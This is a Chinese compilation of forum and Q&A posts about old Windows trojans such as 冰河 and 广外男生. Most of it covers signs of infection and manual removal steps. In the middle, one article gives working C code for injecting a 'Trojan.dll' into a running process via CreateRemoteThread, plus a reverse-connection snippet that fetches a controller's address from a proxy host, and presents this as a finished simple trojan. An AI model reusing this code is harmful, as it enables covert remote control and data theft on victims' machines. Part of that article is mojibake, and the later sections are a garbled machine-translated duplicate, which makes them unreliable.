中了冰河或广外男生等木马后的迹象,以及如何清除该木马?
“冰河”木马病毒是国人编写的一种黑客性质的病毒,感染该病毒之后,黑客就可以通过网络远程控制该电脑。
可以采用以下方法清除该病毒:
1. 在DOS或者Windows安全模式下打开\Windows\System目录,删除Kernel32.exe,Sysexplr.exe,Sendme.dll,Sendme.dl_和Sendme.cfg这几个病毒文件。
2. 打开注册表编辑器,搜索含有Kernel32.exe和Sysexplr.exe的键值,全部删除。
3. 重新启动电脑,将TXT文件的关联程序重新设置为Notepad.exe。
注意:“冰河”木马有很多种版本和变种,清除方式不完全一样,建议使用专门清理木马程序的工具进行清理。
[编辑本段]广外男生
简介
广外男生同广外女生一样,是广东外语外贸大学的作品。
特色
客户端模仿Windows资源管理器:除了全面支持访问远程服务器文件系统,也同时支持通过对方的“网上邻居”,访问对方内部网其他机器 运用了“反弹窗口”技术 使用了“线程插入”技术:服务器运行时没有进程,所有网络操作均插入到其他应用程序的进程中完成。即便受控端安装的防火强有“应用程序访问权限”的功能,也不能对广外男生的服务器进行有效警告和拦截。 不再支持传统的连接方式
广外男生木马的清除
1、检测广外男生木马的有效方法为使用“netstat -na”查看目标主机的网络连接情况,如果端口8225开放,那么该主机可能已经中了广外男生木马。 2、打开注册表编辑器,展开到“HKEY_LOCAL_MACHINE”“SOFTWARE”“Microsoft”“Windows”“CurrentVersion”“Run”下,删除字符串指gwboy.exe。然后到“HKEY_LOCAL_MACHINE”“SOFTWARE”“Classes”“CLSIDT”,删除ID为{5EAE4AC0-146E-11D2-A96E-000000000009}的键及其下所有子键和键值。 3、点击 “编辑”菜单中的 “查找”,在注册表编辑器中搜索gwVboydl1。dll,找到所有和它有关的注册表项,全部删除。 4、删除system32目录下的gwboy.exe。然后进入DOS模式下,输入del winnt\system32\gwVboydll.dll命令,删除system32目录中的gwboydll.dll文件。
该死的conime.exe病毒
如何删除conime.exe‖conime.exe专杀‖删除conime.exe的方法||conime.exe删不掉
conime.exe是输入法编辑器相关程序。注意:conime.exe同时可能是一个bfghost1.0远程控制后门程序。此程序允许攻击者访问你的计算机,窃取密码和个人数据。建议立即删除此进程。
-------------------------------------------------
第1步:
用Msconfig来屏蔽(点开始—运行—输入msconfig—回车,最后一项目conime.exe前的对号),但注册表还是残留它的,建议用注册表编辑器
进入注册表编辑器(点开始—运行—输入regedit—回车)
逐项进入分支:
HKEY_LOCAL_MACHINE
-Software
--Microsoft
---Windows
----CurrentVersion
-----Run
看Run里面(右侧窗口里)有没有这个conime.exe,有就删除
另外在HKEY_CURRENT_USER的相同分支下,也有Run,必须也要看看!
第2步:
重启,搜索看有没有conime.exe这个文件,删了它
有必要的话,可以在DOS(或安全模式)下删除
进程知识库
conime - conime.exe - 进程信息
进程文件: conime 或者 conime.exe
进程名称: BFGhost 1.0
描述:
conime.exe是BFGhost 1.0远程控制后门程序的一部分。这个后门程序能够运行攻击者访问你的计算机,窃取密码和个人数据。这个进程的安全等级是建议立即进行删除。
发现conime.exe进程在网上颇有争议
网上帖:
conime.exe是输入法编辑器,允许用户使用标准键盘就能输入复杂的字符与符号
conime.exeConsoleIMEIME控制台,不是什么病毒程序,不用管她
看看下面:
C:\rundll32hkdoordll,DllRegisterServerconime.exe1
此方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出,conime.exe是你要感染的进程
再看出名的‘广外男生’:
c:\winnt\system32\gwboydll.dll
大约占用内存233K左右,这个进程无法终止,我测试时终止了explorer.exe的进程,gwboydll.dll马上插入另一正常系统进程conime.exe中;因此木马激活后是无法终止的...
此进程的特殊性,conime.exe是病毒光顾的常客,是否有毒,关键看它是否不可中止或无规律自动激活,如果是,杀毒吧
关于第四代木马“广外男生”
您好,这个可以吗 广外男生是广外程序员网络(前广外女生网络小组)精心制作的一款远程控制软件,是一个专业级的远程控制以及网络监控工具。 而广外男生除了具有一般普通木马应该具有的特点以外,还具备独有的特色: 1.客户端高度模仿WINDOWS资源管理器:除了全面支持访问远程服务端的文件系统,也同时支持通过对方的“网上邻居"访问对方内部网其他机器的共享资源! 2.强大的文件操作功能:可以对远程机器进行建立文件夹,整个文件夹(连子目录,文件)一次删除,支持多选的上传,下载等基本功能。同时特别支持高速远程文件查找,而且可对查找结果进行下载和删除的操作! 3.运用了"反弹端口原理"与"线程插入"技术:使用了目前流行的反弹端口的木马技术,由服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,轻松穿过防火墙(包括:包过滤型及代理型防火墙)。 广外男生外观比较漂亮(哈,人家毕竟是专门做木马的,^_^),笔者最近初步研究了一下这个较新的木马!按照帮助文件配置了木马,在自己的PC上作实验了…… 广外男生隐藏了服务端,只有运行服务端时,服务端的进程会短时暴露在任务管理器下,不过是一闪而过!根据广外男生的配置,我们可以知道是它运用了DLL注入到远程进程里面!利用dll插入线程寄生到Windows系统进程(如explorer)中,本身没有单独进程。我们利用注册表监测工具查到复制自身到system32目录下,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加自己,复制寄生到进程的一个DLL到system32目录下,随机写入注册表,位置不固定,重启之后随系统进程启动自身。所以手工查杀很麻烦!DLL之所以位置不固定是由于WINDOWS的原因,DLL是被注册到WINDOWS里,手工注册可以使用regsvr32命令注册,程序也可以实现,不过不在本文讨论范围内。至于端口反弹,很简单,就是服务端连接客户端。广外男生有两种连接方式,一种是面向固定IP的,另一种是面向动态IP的。面向固定IP没什么技术可言,服务端直接连接客户端。面向动态IP的通过中间的代理(因为它的IP是固定的),相当于我们使用的肉鸡,通过配置客户端,生成一个HTM的页面,当然数据是经过加密的。服务端每次启动尝试获取这个文件,把里面的内容解密得到用户最新的IP和连接的端口。主要的代码如下: char *request="GET /guestbook.htm"; //广外男生默认的生成页面 char buffer[2000]; destSockAddr.sin_family = AF_INET; destSockAddr.sin_port=htons(80); deskSocketAddr.Sin_Addr.S_Addr= inet_addr(DEST_IP_ADDR); //代理的IP destSocket=socket(AF_INET,SOCK_STREAM,0); connect(destSocket,(LPSOCKADDR)destSockAddr,sizeof(destSockAddr)); send(destSocket,request,strlen(request)+1,0); recv(destSocket,buffer,2000,0);(续) buffer里就是整个guestbook的内容,当然包括HTTP头部,可以分析里面的内容得到客户机的详细情况! 知道了它的原理,它的神秘面纱很快就被揭开了!我们完全能够用编程实现。为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是Dynamic Link Library(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。程序的关键是利用Kernel32.dll中的LoadLibraryA(W)API获取动态链接库函数入口地址,然后运行该地址以后的代码!由于在主 汤锎唇 嗽冻滔叱蹋 冻滔叱滩凰孀胖鹘 痰乃劳龆 劳觯 挥械彼拗魉劳鍪毕叱滩呕嵬V乖诵校≡诓迦朐断叱讨 氨匦胗蠸E_DEBUG_NAME权限才能插入远线程!OK,我们下面用代码来实现! /********************************************* * inject.c =inject.exe * Author: leonshoh Wong ********************************************/ #include windows.h #include stdio.h #include tlhelp32.h HANDLE hRemoteThread,hRemoteProcess; DWORD dwRemoteProcessid; PWSTR pszLibFileRemote=NULL; DWORD ProcesstoPid(char *pid) //查找指定进程的PID(Process ID) { HANDLE hProcessSnap=NULL; char buffer[MAX_PATH]; PROCESSENTRY32 pe32={0}; int i; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //打开进程快照 if(hProcessSnap==(HANDLE)-1) { printf("\nCreateToolhelp32Snapshot() Error: %d",GetLastError()); return 0; } pe32.dwSize=sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap,pe32)) //开始枚举进程 { do { strcpy(buffer,pe32.szExeFile); for(i=strlen(buffer);i0;i--) //截取进程名 if(buffer=='\\') break; if(!strcmp(pid,buffer)) //判断是否和提供的进程名相等,是,返回进程的ID return pe32.th32ProcessID; } while(Process32Next(hProcessSnap,pe32)); //继续枚举进程 } else { printf("\nProcess32First() Error: %d",GetLastError()); return 0; } CloseHandle(hProcessSnap); //关闭系统进程快照的句柄 return 0; } BOOL SetPrivilege() //本函数用于提升权限,提升到SE_DEBUG_NAME { TOKEN_PRIVILEGES tkp; HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,hToken)) //打开当前进程失败 return FALSE; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,tkp.Privileges[0].Luid); //查看当前权限 tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); //调整权限,如上设置 return TRUE; } int main() { int cb; PTHREAD_START_ROUTINE pfnstartaddr; DWORD Threadid=0; char pszlibfilename[MAX_PATH]; dwRemoteProcessid=ProcesstoPid("notepad.exe"); //得到记事本的PID,当然也可以得到EXPLORER.EXE的PID,不过除非结束它的进程,不然一直驻留在内存中! GetCurrentDirectory(MAX_PATH,pszlibfilename); //得到当前的目录路径 if(pszlibfilename[strlen(pszlibfilename)-1]!='\\') //判断是否为根目录 strcat(pszlibfilename,"file://Trojan.dll/"); else strcat(pszlibfilename,"Trojan.dll"); //连接要插入的动态连接库的文件名(这里是Trojan.dll) if(!SetPrivilege()) { printf("Error in SetPrivilege(): %d\n",GetLastError()); return 1; } hRemoteProcess=OpenProcess(PROCESS_Create_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); //打开notepad.exe的进程得到进程句柄,注意第一个参数(打开句柄设置的权限) if(!hRemoteProcess) { printf("Remote Process not Exist or Access Denied\n"); return -1; } cb=(1+strlen(pszlibfilename))*sizeof(char); //计算dll文件名长度 pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); //申请存放文件名的空间 if(!pszLibFileRemote) { printf("VirtualAllocEx() Error: %d",GetLastError()); return -1; } if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) //把dll文件名写入申请的空间 { printf("WriteProcessMemory() Error: %d",GetLastError()); return -1; } pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA"); //获取动态链接库函数地址 if(!pfnstartaddr) { printf("GetProcAddress() Error: %d\n",GetLastError()); return -1; } hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,Threadid); //创建远程线程,以DLL的文件名为远线程的参数 好,我们执行一下写的所有程式,先运行inject.exe再运行Client.exe。看,服务端连上来了,成功了!(图4) 好了,一个简单的DLL注入和端口反弹的木马就实现了!当然,一个强大的木马有很强大的功能,实现这些功能需要懂得很多系统编程方面的细节,具体可以看shotgun的《揭开木马神秘面纱》,对我们很有启发!这里我就不在重复里面的内容了!
任务中多了 conime.exe这个进程,该怎么办啊
这个是颇具争议的问题
问题一 不是一病毒
conime.exe是输入法编辑器,允许用户使用标准键盘就能输入复杂的字符与符号
conime.exeConsole IME IME控制台,不是什么病毒程序,不用管她
看看下面:
C:\rundll32 hkdoordll,DllRegisterServer conime.exe 1
此方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出,conime.exe是你要感染的进程
再看出名的‘广外男生’:
c:\winnt\system32\gwboydll.dll
大约占用内存233K左右,这个进程无法终止,我测试时终止了explorer.exe的进程,gwboydll.dll马上插入另一正常系统进程conime.exe中;因此木马激活后是无法终止的...
问题二 是病毒
conime.exe这个进程正常情况下是输入法,但是很多木马病毒之类的为了伪装自己,把自己名字也改为conime.exe,所以就有了你在网上看到的争议了。至于你计算机上的这个进程是不是病毒,还是安装杀毒软件来查查吧。
木马是只盗它所在文件里的密码还是所有密码
好的木马当然是什么都盗,具体的要看你中木马的类型了。
1.反弹端口木马
普通木马的都是由C端发送请求S端来连接,但有些另类的木马就不是这样,它由S端向C端发送请求。大家知道,网络防火墙都有监控网络的作用,但它们大多都只监控由外面近来的数据,对由里向外数据的却不闻不问。反弹端口木马正好利用了这一点来躲开网络防火墙的阻挡,以使自己顺利完成任务。大名鼎鼎的“网络神偷”就是这样一类木马。它由S断向C端发送一个连接请求,C端的数据在经过防火墙时,防火墙会以为是发出去的正常数据(一般向外发送的数据,防火墙都以为是正常的)的返回信息,于是不予拦截,这就给它了可钻的空子。
2.无进程木马
普通木马在运行时都有自己独立的进程,利用“柳叶擦眼”一类的优秀进程查看软件就可以发现和终止它。为了更好的隐藏自己,木马的制作者就想了一些办法,把木马的程隐藏进正常的进程(宿主进程)内。这样就不容易被发现,而且也不容易被终止。在实际中,即使你发现了隐藏在某一正常进程中的木马进程,你也不敢轻易终止它,因为一旦终止了木马的进程,正常的宿主进程也就被终止,这可能导致一些严重的后果。所以可以看出,无进程木马实际上是“隐藏进程木马”,而这也是它的高明之处。在实际中不可能出现真正意义上的“无进程木马”。最近出现的“广外男生”就是典型的例子。
3.无控制端木马
这类木马最显著的特点是C端和S端是集成到一起的,一次配置好就不能再更改。功能一般比较专一,针对性强,危害较小,查杀较简单。经常用来偷取QQ、Email和网络游戏的密码等。
4.嵌套型木马
先用自己写的小程序或者利用系统的漏洞,夺取到某写特定的权限,比如上传文件,干掉网络防火墙和病毒防火墙等,然后上传修改过或没修改过的功能强大的木马,进一步夺取控制权。于是这个小程序或者系统漏洞就和那个功能强大的真正的木马联合起来,组成了一款“嵌套型木马”,其特点是不容发现和查杀,“具有良好的发展前景”。
5.其他木马
严格意义上讲,这里所说的其他木马并不是真正的木马,它们只能算做是木马入侵时的辅助工具吧。典型的有恶意网页代码,让你浏览后不知不觉就被完全共享了所有的硬盘,然后方便别人给你种下木马,为进一步入侵做好准备。
木马的本质是什么?
计算机木马介绍
一、木马的来历
计算机木马是一种后门程序,常被黑客用作控制远程计算机的工具。英文单词“Trojan”,直译为“特洛伊”。木马这个词来源于一个古老的故事:相传古希腊战争,在攻打特洛伊时,久攻不下。后来希腊人使用了一个计策,用木头造一些大的木马,空肚子里藏了很多装备精良的勇士,然后佯装又一次攻打失败,逃跑时就把那个大木马遗弃。守城的士兵就把它当战利品带到城里去了。到了半夜,木马肚子里的勇士们都悄悄的溜出来,和外面早就准备好的战士们来了个漂亮的里应外合,一举拿下了特洛伊城。这就是木马的来历。从这个故事,大家很容易联想到计算机木马的功能。
二、计算机木马原理
计算机木马一般由两部分组成,服务端和控制端,也就是常用的C/S(CONTROL/SERVE)模式。
服务端(S端):远程计算机机运行。一旦执行成功就可以被控制或者造成其他的破坏,这就要看种木马的人怎么想和木马本身的功能,这些控制功能,主要采用调用Windows的API实现,在早期的dos操作系统,则依靠DOS终端和系统功能调用来实现(INT 21H),服务段设置哪些控制,视编程者的需要,各不相同。
控制端(C端)也叫客户端,客户端程序主要是配套服务段端程序的功能,通过网络向服务段发布控制指令,控制段运行在本地计算机。
三、传播途径
木马的传播途径很多,常见的有如下几类:
1. 通过电子邮件的附件传播。这是最常见,也是最有效的一种方式,大部分病毒(特别是蠕虫病毒)都用此方式传播。首先,木马传播者对木马进行伪装,方法很多,如变形、压缩、脱壳、捆绑、取双后缀名等,使其具有很大的迷惑性。一般的做法是先在本地机器将木马伪装,再使用杀毒程序将伪装后的木马查杀测试,如果不能被查到就说明伪装成功。然后利用一些捆绑软件把伪装后的木马藏到一幅图片内或者其他可运行脚本语言的文件内,发送出去。
2. 通过下载文件传播。从网上下载的文件,即使大的门户网站也不能保证任何时候他的问件都安全,一些个人主页、小网站等就更不用说了。下载文件传播方式一般有两种,一种是直接把下载链接指向木马程序,也就是说你下载的并不是你需要的文件。另一种是采用捆绑方式,将木马捆绑到你需要下载的文件中。
3. 通过网页传播。大家都知道很多VBS脚本病毒就是通过网页传播的,木马也不例外。网页内如果包含了某些恶意代码,使得IE自动下载并执行某一木马程序。这样你在不知不觉中就被人种上了木马。顺便说一句,很多人在访问网页后IE设置被修改甚至被锁定,也是网页上用脚本语言编写的的恶意代码作怪。
4. 通过聊天工具传播。目前,QQ、ICQ、MSN、EPH等网络聊天工具盛行,而这些工具都具备文件传输功能,不怀好意者很容易利用对方的信任传播木马和病毒文件。
四、一些特殊类型的木马
1.反弹端口木马:普通木马的都是由C端发送请求S端来连接,但有些另类的木马就不是这样,它由S端向C端发送请求。这样做有什么好处呢?大家知道,网络防火墙都有监控网络的作用,但它们大多都只监控由外面近来的数据,对由里向外数据的却不闻不问。反弹端口木马正好利用了这一点来躲开网络防火墙的阻挡,以使自己顺利完成任务。大名鼎鼎的“网络神偷”就是这样一类木马。它由S断向C端发送一个连接请求,C端的数据在经过防火墙时,防火墙会以为是发出去的正常数据(一般向外发送的数据,防火墙都以为是正常的)的返回信息,于是不予拦截,这就给它了可钻的空子。
2.无进程木马:“进程”是一个比较抽象的概念,可以理解为排队买电影票,每一个窗口(其实就是端口)排的人可以理解为一个进程,有多少窗口就有多少个进程。普通木马在运行时都有自己独立的进程(某一特定窗口排的人,先当作小偷),利用“柳叶擦眼”一类的优秀进程查看软件就可以发现和终止它。这岂不是太扫兴了?好不容易写出个木马就这么被你发现了。为了更好的隐藏自己,木马的制作者就想了一些办法,把木马的程隐藏进正常的进程(宿主进程)内。打个比方,正常的进程(系统和正当文件的进程)可以理解为正常排队买票的人。而木马的进程(排队假装买票的小偷),他们如果都排在某一个窗口(通过某一特定端口进行通讯),很容易就被发现了,于是那些小偷就想办法混到正常排队人当中(实现了木马进程的隐藏),这样就不容易被发现,而且也不容易被终止。在实际中,即使你发现了隐藏在某一正常进程中的木马进程,你也不敢轻易终止它,因为一旦终止了木马的进程,正常的宿主进程也就被终止,这可能导致一些严重的后果。所以可以看出,无进程木马实际上是“隐藏进程木马”,而这也是它的高明之处。在实际中不可能出现真正意义上的“无进程木马”。最近出现的“广外男生”就是典型的例子。
3.无控制端木马: 这类木马最显著的特点是C端和S端是集成到一起的,一次配置好就不能再更改。功能一般比较专一,针对性强,危害较小,查杀较简单。经常用来偷取QQ、Email和网络游戏的密码等。
4.嵌套型木马:先用自己写的小程序或者利用系统的漏洞,夺取到某写特定的权限,比如上传文件,干掉网络防火墙和病毒防火墙等,然后上传修改过或没修改过的功能强大的木马,进一步夺取控制权。于是这个小程序或者系统漏洞就和那个功能强大的真正的木马联合起来,组成了一款“嵌套型木马”,其特点是不容发现和查杀,“具有良好的发展前景”。
5.其他木马:严格意义上讲,这里所说的其他木马并不是真正的木马,它们只能算做是木马入侵时的辅助工具吧。典型的有恶意网页代码,让你浏览后不知不觉就被完全共享了所有的硬盘,然后方便别人给你种下木马,为进一步入侵做好准备。
五、关于捆绑
木马捆绑,通俗地讲就是把木马的代码嵌入其他类型的文件,便于伪装,比如,大名鼎鼎的国产木马“冰河”,他就自带一个捆绑工具,可以把木马代码嵌入到网页文件、图片文件、可执行文件等多种支持脚本语言或运行代码的文件中。当接受方收到这些文件时,几乎感觉不到有任何异样,但在后台,木马代码却悄然进入内存并运行。
红米饭上传的主题,然后点击下载,为什么不能下载呢?风格的主题已经被清除了数据。
采用电脑木马,木马起源
计算机是一个后门木马,黑客经常被用来作为一种工具来控制远程计算机。英文单词“木马”,直译为“特洛伊”。这个词来自老马的故事:相传,在当时对特洛伊古希腊战争中,久攻不下。后来,希腊人用一招,用木头做的一些大的马,空腹子里藏有很多全副武装的战士,然后假装攻击再次失败,当逃跑了那么大的马被遗弃。战士维护者把它作为战利品带到城里。到了半夜,特洛伊勇士们的肚子已经悄悄溜了出来,和外面早已准备好的士兵们相当合作,赢得特洛伊。这是木马的起源。从这个故事中,我们可以很容易地想到一个计算机木马的功能。
两台电脑木马的电脑
原则,一般由两部分组成,服务器端和控制端,这是常用的C / S(控制/ SERVE)模式。
服务器(S端子):远程计算机上运行。一旦实施成功是可以控制的,或造成其他损坏,这取决于人们如何想种木马本身的功能,这些控制功能,主要是调用操作系统的早期DOS的Windows API的实现,依靠DOS调用到终端和系统的功能来实现(INT 21H),它控制服务部集合,取决于程序员的需要,是不同的。
控制端(C端),也称为客户端,客户端程序支持服务板块主要功能端程序,发布控制指令到服务通过一个网段,在本地计算机上运行的控制段。
木马,常见的有以下几种: 1。传播。这是最常见的,同时也是最有效的方式,大部分病毒(特别是蠕虫)都是通过这种方式传播。首先,木马传播者的伪装,在许多方面,如扭曲,受压,脱壳,捆绑起来,采取双重后缀名等,它有很多的困惑。一般的做法是变相的本地机器上的木马,然后查杀木马伪装的测试,如果它不能找到解释伪装成功后使用的防病毒程序。然后使用随机软件的一些隐藏的木马病毒伪装成图片或其他脚本语言可以运行的文件发送。通过下载的文件传输
2。从互联网上下载文件,即使在大的门户网站不能保证任何时候他问成员都是安全的,有些个人主页,更不用说小网站。下载一般传输的文件模式有两种,一种是直接将下载链接木马,那是不是你下载你需要的文件。另一种方法是使用捆绑的木马捆绑到你需要下载的文件。 3传播。我们都知道,很多VBS脚本病毒是通过网页传播的木马也不例外。如果网站包含一些恶意代码,使IE浏览器自动下载并执行木马程序。所以,你在不知不觉中是在赛马。顺便说一句,很多人访问的页面后进行IE设置,甚至被锁定,同时也对网页脚本语言带有恶意代码的恶作剧。 4传播。目前,QQ,ICQ,MSN,EPH和其他网络聊天工具的普及,但这些工具有文件传输功能,病人可以很容易地利用对方的信任传播木马和病毒文件。
4,一些特殊类型的木马
1,反弹端口:普通木马程序发送的C端请求连接到S,但有些另类的木马是不是这样的,它由S端子到C发送请求。有什么好处呢干什么?如你所知,网络监控网络的作用有防火墙,但大多只是从外面监视的最新数据,但视而不见将数据从内到外。木马反弹端口只是用它来躲避网络防火墙来阻止,为了使自己圆满完成了任务。著名的“网络大盗”是这样一类马。它是用S通过防火墙时,通过发送关闭连接请求到C端,C端的数据,防火墙就会认为发出的正常数据(该数据一般是发出去了,防火墙认为这是正常的)返回的信息,所以不要我拦截,这使得它钻漏洞。
2,无进程木马“程序”是一个比较抽象的概念,可以理解为排队买电影票,每个窗口(实际上的端口)的人行可以被理解为一个过程,有多少窗多少个进程存在。在运行普通的木马都有自己单独的进程(人一个特定的窗口排,第一次作为一个贼),用“柳叶擦眼”优良的工艺一类浏览软件,可以发现并终止它。这岂不是太让人失望了?所以最后写你所发现的木马。为了更好地隐藏自己,木马制作者想一些方法来隐藏木马的方式进入正常程序(主机进程)中。打个比方,正常的过程(流程系统和合法的文件)可以理解为法线亲自买票。该木马程序(排队买票小偷假装),如果他们(通过特定的端口进行通信)排在一个窗口,很容易被发现,所以小偷想接近那些谁是正常的队列之中夹杂(以实现木马隐藏处理),所以不容易被发现,并且是不太可能被终止。在实践中,即使你找到了隐藏在一个正常的过程中木马的过程中,你不能轻易终止它,因为一旦终止木马进程,正常的主机进程将被终止,这可能会导致一些严重的结果。所以我们可以看到,没有过程木马实际上是一个“隐藏的进程木马”,这是它的高明之处。真正意义上的在实践中不可能“无进程木马”。 “广外男生”近期出现,是一个典型的例子。
3,没有控制终端木马:这些木马最显着的特点是在C-末端和S被集成在一起,一旦被配置,不能更改。功能一般比较具体,针对性强,危害性较小,造成相对简单。经常被用来盗取QQ,电子邮件和网络游戏密码。
4,嵌套木马:先写一个小程序,或利用系统漏洞,赢得写一个特定的权限,如上传文件,摆脱网络防火墙和病毒防火墙,然后上传或不功能强大的木马程序,进一步抢占控制。因此,在强大的和真正的木马起来这个小程序或系统漏洞,形成了“嵌套木马”,其特色是没有发现和查杀“,具有良好的发展前景。”
5,其他木马:从严格意义上讲,其他人都在谈论这是不是一个真正的木马,它们只能算作援助木马入侵了。典型的恶意网页代码,让你浏览后不知不觉中所有的硬盘得到了充分的共享,然后方便别人种植木马,进一步入侵做准备。
5,关于捆绑
木马捆绑的,简单地说就是将木马代码嵌入其他类型的文件,便于伪装,例如,由著名的特洛伊木马“冰”,他自带的捆绑工具,木马代码可以被嵌入到各种的脚本语言或运行代码文件页面文件,图像文件,可执行文件等的支持。当收件人收到这些文件几乎感觉不到任何异样,但在后台,木马代码到内存中,并悄悄地运行。
如果您的电脑莫名其妙地崩溃,或重新启动,如果硬盘被访问在没有频繁操作,如果系统是莫须有的搜索软盘,CD-ROM中,如果系统是出奇的慢,系统资源占用率太高了...你已经知道你的电脑可能中木马被植入?
“特洛伊木马”,这惊心动魄的战争不是历史,但互联网是一个危险的过程大祸害。木马在当今无处不在的网络可以被描述为“BO了Back Orifice”,“冰”是一种木马程序,甚至掌上电脑(PDA)在世界上一个“木马”程序(自由裂纹)。人们谈“马”色变,现在,我给你说说,到底是怎么回事了可怕的“特洛伊木马”。
什么是“特洛伊木马”
就像在同一个历史上的“特洛伊木马”,被称为“木马”程序,也是一个美丽的外表成藏匿在我们的内部计算机的东西。相反,“特洛伊木马”是伪装吸引用户下载执行,从而破坏或窃取用户的重要文件和信息的伪装欺骗程序。 木马病毒,它不会自我繁殖,也并不“刻意”去感染其他文件,它的主要作用就是打开电脑是谁种应用木马的人门户网站,使对方可以任意毁坏,窃取文件,甚至远程控制你的计算机。木马和计算机网络经常使用远程控制软件是不同的。虽然两者的主要功能可以被远程控制,但远程控制软件是“好”的控制,因此通常不具有隐蔽性。木马是完全相反的,要达到的木马是远程控制的“盗窃”,所以如果没有隐蔽性强,那么马简直是“没有价值”。
木马的工作原理
一个完整的“木马”程序包含两个部分:“服务器”和“控制”。植入你的电脑就是它的“服务器”部分,而所谓的“黑客”是利用“控制器”到“服务器”的计算机的运行。
大家都知道,连接到基于Internet的TCP / IP协议的电脑有0-65535共有256×256端口。我们平时上网的时候,电脑通过端口139保持联系与外界木马程序运行的“服务器”后,你的电脑就会有一个或多个其它端口是开放的,所以黑客可以利用这些打开的端口进入你的系统,你的系统就没有安全和个人隐私的保护!
木马如此“泛滥”,到底我们怎么知道我们的计算机种植木马呢?
木马运行的迹象
如果莫名其妙地机或重新启动计算机;
如果硬盘被频繁访问的操作中不存在的;
如果系统是莫须有的搜索软盘,CD-ROM;
如果系统异常缓慢,系统资源占用率过高......
这些时候,你要小心了!你可能已经和“木马”了“亲密接触”!到底这些“恐怖分子”是如何我们的电脑“摆平”了吗?
木马隐藏和启动
木马的客户端计算机后,进入服务,你需要以某种方式后自行激活,运行和自启动的加载到系统中节目顺序。了解如何激活木马本身是找到并删除该木马程序的关键。
检查方法木马
端口扫描是检测木马的常用方法。我们前面说的,不打开任何网络内部部署软件仅139口,电脑连接到互联网的开放。因此,我们可以关闭所有网络软件,然后使用“代理猎手”之类的端口扫描软件进行扫描的计算机端口,如果有139端口进行外部打开,那么你是中了木马毫无疑问的。
为了找到木马的位置,可以用它来检测内存的方法。运行“C:\ WINDOWS \ DRWATSON.EXE”,这是Windows系统,“华生医生”,可以把系统内存的照片,以获得相关信息。拍照后,查看“程序”项“任务”选项卡中的“高级搜索”,是被列在正在运行的程序。对于可疑程序,然后选中“路径”一栏,你可以找到这个程序,所以你知道它到底是不是木马。
手动删除该木马程序
如果您认为找到木马,删除无事可做,那么你就错了。删除木马,有时却是最困难的工作,如果没有彻底清除,木马很容易“灰复燃”。首先应该想到的方法是使用杀毒软件,杀毒软件还是不错的,毕竟,在“反恐”专家锻炼。所以要注意什么手工删除?
很多木马本身有它的功能可自动检测从一开始的项目,如果不删除该木马程序的情况下首先删除其启动项目,木马立刻但这些初创相关信息重新编写的文件或注册表相关的位置。因此,最稳妥的办法是确定的木马到位后的首次重新启动计算机,进入DOS方式,在DOS下删除该木马程序,然后再返回到Windows,删除与其相关的启动信息。
木马文件名后面的麻烦 - 木马为了更好地隐藏自己,并给你带来麻烦,类似于Windows的系统文件生成的文件名服务器名。如木马子七1.7版本的服务器文件名是C:\ WINDOWS \ kernel16.dll,而Windows有一个系统文件C:\ WINDOWS \ kernel32.dll中。再次,木马阶段1.0版本,生成的木马是C:\ WINDOWS \ SYSTEM \ MSGSRV32.EXE和Windows系统文件完全相同,只是不同的图标,就可以正确地这些和删除之间的区别?另外,不要忘了,文件名是可以改变的。你可能会认为,在的netbus Trojan'd有Mring.exe或SYSEDIT.EXE这样的文件出现,但我把它改为123.EXE你可以做什么?所以,不要一味依赖“常识”。
最后,也是最困难的,就是“多重打击”的木马带来了麻烦。例如,一个名为“智能基因”国产“文件关联”木马,只要服务器在运行,它会生成C:\ WINDOWS \ MBBManager.exe和Explore32.exe和C:\ WINDOWS \ SYSTEM \ editor.exe这三个文件是他们使用的HTM文件图标,如果你的系统设置不显示扩展已知文件类型的,真以为自己是HTM文件吧! Explore32.exe协会HLP文件,MBBManager.exe在启动时加载,Editor.exe关联TXT文件。当你发现并删除MBBManager.exe,当你完成,只要打开HLP文件或文本文件,哪怕只有一次,Explore32.exe和Editor.exe被激活并重新生成MBBManager.exe。类似的手段更加强大的木马程序也是如此。要手动删除该木马程序,必须有足够的电脑知识,丰富的经验和冷静的头脑,敏锐的洞察力和高度的警惕和卓越的分析能力的工作 - 